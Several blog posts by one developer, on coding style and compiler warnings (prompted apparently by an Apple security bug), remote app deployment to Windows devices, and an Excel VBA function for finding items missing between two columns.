OK, so it’s considered macho to not rely on an IDE. I’ve never understood that. It’s rather like saying how much you prefer pounding nails in with your bare fists, because it demonstrates how much more of a man you are than the guy with a hammer. It doesn’t make sense when you compare how fast the job gets done, or the silly and obvious errors that turn up clearly when the IDE handles your indenting, colouring, and style for you.
Yes, colouring. I know, colour-blind people exist – and those people should adjust the colours in the IDE so that they make sense. Even a colour-blind person can get shade information to help them. I know syntax colouring often helps me spot when an XSS injection is just about ready to work, when I would otherwise have missed it in all the surrounding garbage of HTML code. The same is true when building code, you can spot when keywords are being interpreted as values, when string delimiters are accidentally unescaped, etc.
The same is true for indentation. Indentation, when it’s caused by your IDE based on parsing your code, rather than by yourself pounding the space bar, is a valuable indication of program flow. If your indentation doesn’t match control flow, it’s because you aren’t enforcing indentation with an automated tool.
Your IDE and your check-in process are a great place to enforce style standards to ensure that code is not confusing to the other developers on your team – or to yourself.
A little secret – one of the reasons I’m in this country in the first place is that I sent an eight-page fax to my bosses in the US, criticising their programming style and blaming (rightly) a number of bugs on the use of poor and inconsistent coding standards. This was true two decades ago using Fortran, and it’s true today in any number of different languages.
The style that was missed in this case – put braces around all your conditionally-executed statements.
I have other style recommendations that have worked for me in the past – meaningful variable names, enforced indenting, maximum level of indenting, comment guidelines, constant-on-the-left of comparisons, don’t include comparisons and assignments in the same line, one line does one thing, etc, etc.
Make sure you back the style requirements with statements as to what you are trying to do with the style recommendation. “Make the code look the same across the team” is a good enough reason, but “prevent incorrect flow” is better.
gcc has the option “-Wunreachable-code”.
gcc disabled the option in 2010.
gcc silently disabled the option, because they didn’t want anyone’s build to fail.
This is not (IMHO) a smart choice. If someone has a warning enabled, and has enabled the setting to produce a fatal error on warnings, they WANT their build to fail if that warning is triggered, and they WANT to know when that warning can no longer be relied upon.
So, without a warning on unreachable code, you’re basically screwed when it comes to control flow going where you don’t want it to.
And of course there’s the trouble that’s caused when you have dozens and dozens of warnings, so warnings are ignored. Don’t get into this state – every warning is a place where the compiler is confused enough by your code that it doesn’t know whether you intended to do that bad thing.
Let me stress – if you have a warning, you have confused the compiler.
This is a bad thing.
You can individually silence warnings (with much comments in your code, please!) if you are truly in need of a confusing operation, but for the most part, it’s a great saving on your code cleanliness and clarity if you address the warnings in a smart and simple fashion.
The compiler has an optimiser.
It’s really good at its job.
It’s better than you are at optimising code, unless you’re going to get more than a 10-20% improvement in speed.
Making code shorter in its source form does not make it run faster. It may make it harder to read. For instance, this is a perfectly workable form of strstr:
const char * strstr(const char *s1, const char *s2)
Can you tell me if it has any bugs in it?
What’s its memory usage? Processor usage? How would you change it to make it work on case-insensitive comparisons? Does it overflow buffers?
Better still: does it compile to smaller or more performant code, if you rewrite it so that an entry-level developer can understand how it works?
Now go and read the implementation from your CRT. It’s much clearer, isn’t it?
Releasing the patch on Friday for iOS and on Tuesday for OS X may have actually been the correct move – but it brings home the point that you should release patches when you maximise the payoff between having your customers patch the issue and having your attackers reverse engineer it and build attacks.
Where is the security announcement at Apple? I go to apple.com and search for “iOS 7.0.6 security update”, and I get nothing. It’d be really nice to find the bulletin right there. If it’s easier to find your documentation from outside your web site than from inside, you have a bad search engine.
People who know me may have the impression that I hate Apple. It’s a little more nuanced than that.
I accept that other people love their Apple devices. In many ways, I can understand why.
I have previously owned Apple devices – and I have tried desperately to love them, and to find why other people are so devoted to them. I have failed. My attempts at devotion are unrequited, and the device stubbornly avoids helping me do anything useful.
Instead of a MacBook Pro, I now use a ThinkPad. Instead of an iPad (remember, I won one for free!), I now use a Surface 2.
I feel like Steve Jobs turned to me and quoted Dr Frank N Furter: “I didn’t make him for you.”
So, no, I don’t like Apple products FOR ME. I’m fine if other people want to use them.
This article is simply about a really quick and easy example of how simple faults cause major errors, and what you can do, even as an experienced developer, to prevent them from happening to you.
Now that I have a Surface 2, I’m going to leave my laptop at home when I travel.
This leaves me with a concern – obviously, I’m going to play with some of my hobby software development while I have “down time”, but the devices for which I’m building are traveling with me, while the dev machine stays at home.
That’s OK where I’m building for the laptop, because it’s available by Remote Desktop through a Remote Desktop Gateway.
Deploying to my other devices – the Windows Phone and the Surface 2 running Windows RT – is something that I typically do by direct connection, or on the local network.
For the Windows Phone, there’s a Store called “Beta” as opposed to “Public”, into which you can deploy your app, make it available to specific listed users, and this will allow you to quickly distribute an app remotely to your device.
Details on how to do this are here.
The story on Windows Store apps appears, at first blush, to be far more dismal, with numerous questions online asking “is there a beta store for Windows like there is for the phone?”
The answer comes back “no, but that’s a great idea for future development”.
But it is completely possible to distribute app packages to your Windows RT and other Windows 8.1 devices, using Powershell.
The instructions at MSDN, here, will tell you quite clearly how you can do this.
I often need to compare two columns, and get a list in a third column of the items that are in one column, but not the other.
Every solution I find online has one common problem – the third column is full of blanks in between the items. I don’t want blanks. I want items.
So I wrote this function, which returns an array of the missing items – items which are in the first parameter, but not in the second.
I’m probably missing a trick or two (I’m particularly not happy with the extra element in the array that has to be deleted before the end), so please feel free to add to this in the comments.
Public Function Missing(ByRef l_ As Range, ByRef r_ As Range) As Variant() ' Returns a list of the items which are in l_ but not in r_ ' Note that you need to put this formula into a range of cells as an array formula. ' So select a range, then type =Missing($A:$A,$B:$B), and press Ctrl-Shift-Enter ' If the range is too big, you'll get lots of N/A cells Dim i As Long ' loop through l_ Dim l_value As Variant ' current value in l_ Dim y() As Variant ' Temp array to store values found ReDim y(0) For i = 1 To l_.Count ' Loop through input l_value = l_.Cells(i, 1) ' Get current value If Len(l_value) = 0 Then ' Exit when current value is empty GoTo exitloop End If If r_.Find(l_value) Is Nothing Then ' Can't find current value => add it to the missing ReDim Preserve y(UBound(y) + 1) ' Change array size y(UBound(y) - 1) = l_value ' Add current value to end End If Next i exitloop: If UBound(y) < 1 Then Return End If ReDim Preserve y(UBound(y) - 1) If Application.Caller.Rows.Count > 1 Then ' If we were called from a vertical selection Missing = Application.Transpose(y) ' Transpose the array to a vertical mode. Else Missing = y ' otherwise just return the array horizontally. End If End Function